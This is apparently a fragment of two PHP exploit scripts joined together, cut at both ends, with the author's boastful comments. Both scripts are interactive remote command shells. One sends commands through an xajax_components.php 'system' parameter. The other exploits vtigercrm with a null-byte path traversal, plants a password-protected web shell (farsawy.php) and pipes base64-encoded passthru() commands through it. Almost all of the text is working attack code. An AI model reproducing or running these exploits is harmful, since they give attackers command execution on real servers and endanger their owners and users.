echo "| n0p1337@gmail.com |\n"; echo "+-------------------------------------------+\n"; echo "\n| Enter Target [https://ip] # "; $target = trim(fgets(STDIN)); function faget($url, $post) { $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_POSTFIELDS, $post); curl_setopt($curl, CURLOPT_COOKIEFILE, '/'); curl_setopt($curl, CURLOPT_COOKIEJAR, '/'); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 0); curl_setopt($curl, CURLOPT_TIMEOUT, 20); curl_setopt($curl, CURLOPT_HEADER, false); $exec = curl_exec($curl); curl_close($curl); return $exec; } while (1) { echo "\ni-Hmx@" . str_replace("https://", "", $target) . "# "; $cmd = trim(fgets(STDIN)); if ($cmd == "exit") { exit; } $f_rez = faget($target . "/plib/xajax_components.php?varname=system", "fid-system={$cmd}"); echo $f_rez; } # NP : Just cleaning my pc from an old old trash , The best is yet to come ;)
return substr($string, $ini, $len); } $me = faget($target . "/vtigercrm/phprint.php?action=fa&module=ff&lang_crm=../../cache/import/IMPORT_%00", ""); echo "| Testing total payload\n"; $total = faget($target . "/vtigercrm/farsawy.php", "pwd=1337"); if (!eregi("Faris on the mic :D", $total)) { die("[+] Exploitation Failed\n"); } echo "| Sending CMD test package\n"; $cmd = faget($target . "/vtigercrm/farsawy.php", "pwd=1337&fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw=="); if (!eregi("farsawy", $cmd)) { echo " + Cmd couldn't executed but we can evaluate php code\n + use :\r\n{$target}//vtigercrm/fa.php\n Post : fa=base64code\n"; } echo "| sec4ever shell online ;)\n\n"; $host = str_replace('https://', '', $target); while (1) { echo "i-Hmx@{$host}# "; $c = trim(fgets(STDIN)); if ($c == 'exit') { die("[+] Terminating\n"); } $payload = base64_encode("passthru('{$c}');"); $f**k = faget($target . "/vtigercrm/farsawy.php", "pwd=1337&fa={$payload}"); $done = kastr($f**k, "-----------------", "-----------------"); echo "{$done}\n"; } /* I dont even remember when i exploited this shit! maybe on 2013?! whatever , Hope its not sold as 0day in the near future xDD */